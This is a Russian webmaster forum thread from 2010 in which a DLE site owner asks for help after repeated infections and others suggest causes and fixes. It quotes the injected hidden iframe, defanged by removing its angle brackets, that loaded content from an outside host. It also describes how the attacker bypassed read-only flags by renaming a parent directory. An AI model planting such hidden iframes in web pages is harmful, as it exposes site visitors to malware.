- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день уважаемые форумчане.
02.06.2010 был взломан сайт. Версия DLE 8.5 лицензионная.
Принцип взлома следующий в файлы main.tpl прописывался левый ифрейм.
Либо же в файлы
<script type="text/javascript" src="/engine/classes/js/menu.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_ajax.js"></script>
<script type="text/javascript" src="/engine/classes/js/js_edit.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
прописывался зашифрованный код, который тоже подгружал левый ифрем.
С яндекса начали приходить письма, мол на сайте вирус, и сайт будет выводиться в поиске с пометкой не безопастный .
Удалил код ифрейма. Сменил пароли везде, проверил на посторонние файлы. Все почистил. Сутки все ок, а потом сново вирус в файлах яваскрипта. Решил на все файлы куда прописывался вирус поставить права 0444 (только чтение). И попросил админов запретить изменение прав на все эти фалы.
На след день захожу и вижу сново прописанный код в файлах яваскрипта. На вопрос к аддминам как так получилоась? Полчил сдеж ответ.
Злоумышленник не изменял файлы на которые мы установили приоритетный флаг, он просто переименовал директорию выше,
к примеру /site.ru/engine/classes/ была изменена на директорию /site.ru/engine/conf
Затем создал новую директорию site.ru/engine/classes/ скопировав туда все старые файлы уже без флага иммунитета
Тем самым уже внедрил вредоносный код в нужные файлы.
Снес полностью сайт, все посторонние модули убрал, только все что предлагает дле оставил.
ЗАлил оригинальные файлы с оф сайта дле. Попросил админов сменить пароли на все что можно, и не говорить мне (дабы исключить заряжение моегго компа хотя проверялся и КИС 2010 (лицензия) и ДР веб куриет). так и сделали. Сегодня утром проснулся и вижу на сайте сново вирус. Я в шоке и не знаю как дальше себя вести и что делать. Надеюсь найду помощь и ответы здесьь. Буду рад любому откликнувшемуся
Вот пример ифрейма.
[not-group=1,2,3] iframe src="http://miminus.ru/amg.cgi?stats" width="1" height="2" style="visibility: hidden;"> /iframe[/not-group]
скобки в iframe убрал
Все модули отключены реклама отключена , кроме маркетгида. ..
Да вот пример ифрейма.
хостеры виноваты. Если у них на фтп левый чувак может создавать директории с админскими правами, Вы хоть мильен раз снесите сайт - не поможет. Меняйте хостинг
фтп отключен. Работает только сфтп и то ограничен с двух ип. Это мой домашний инет + ноутбук
Причем арендую собственный сервер + админы к нему.
Нельзя исключать взлом хостинга, тогда вы ничего не сделаете.
админы сервера уже два раза просканили сервак на наличие шелов и вирусов. Результат отрицательный
Арендую собственный сервер + админы к нему.
я хостюсь сейчас на хостинге где можно r52 shell (кажется так называется) и лазить по всем дерикториям сервера, можно зайти в любой каталог к левому дяде и творить чудеса. И этот хост я думаю не исключение, таких очень много. Запрет по ip тоже не показеть, опять тот же шелл залил и вперед.
Если тебе админы говорят что шелов нет (а доступ к фтп только по твоему ip), а на сайте та же самая ерунда происходит, то скорее всего админы работать не хотят. Хотя возможен реальный баг в DLE =(
Мое мнение админы лепят чушь =) залей дамп своего сайта на другой хост, смени DNS на домене и подожди =) повторится ли ситуация =) а там уже сравним настройки сервера и всего прочего, метом исключения найдем слабое место =) готов посадействовать, если интересно в ЛС контакты шли
budeniy добавил 04.07.2010 в 15:40
на эту тему http://dleshka.org.ru/main/1181-seryoznaya-uyazvimost-vsex-versij.html
описано как избавиться, кстати тоже советую попробовать
Принцип взлома следующий в файлы main.tpl прописывался левый ифрейм.
...
Злоумышленник не изменял файлы на которые мы установили приоритетный флаг, он просто переименовал директорию выше
:D
А спросить как злоумышленник попал на сервер религия не позволяет?
Складывается впечатление, что или админы над вами глумятся, или правда дебилы.
http://3ucoz.ru/winscp-bezopasnyj-ftp-klient/
пользуюсь для ходьбы по сфтп WinSCP 4.7
Посмотрите на предмет левых юзеров на сервере и админов на сайте. Если возможно, переустановите сервер.
Я первым делом это проверилд. НИ на сайте кроме аккаунта админа нету , ни на сервере кроме того под которым хожу я.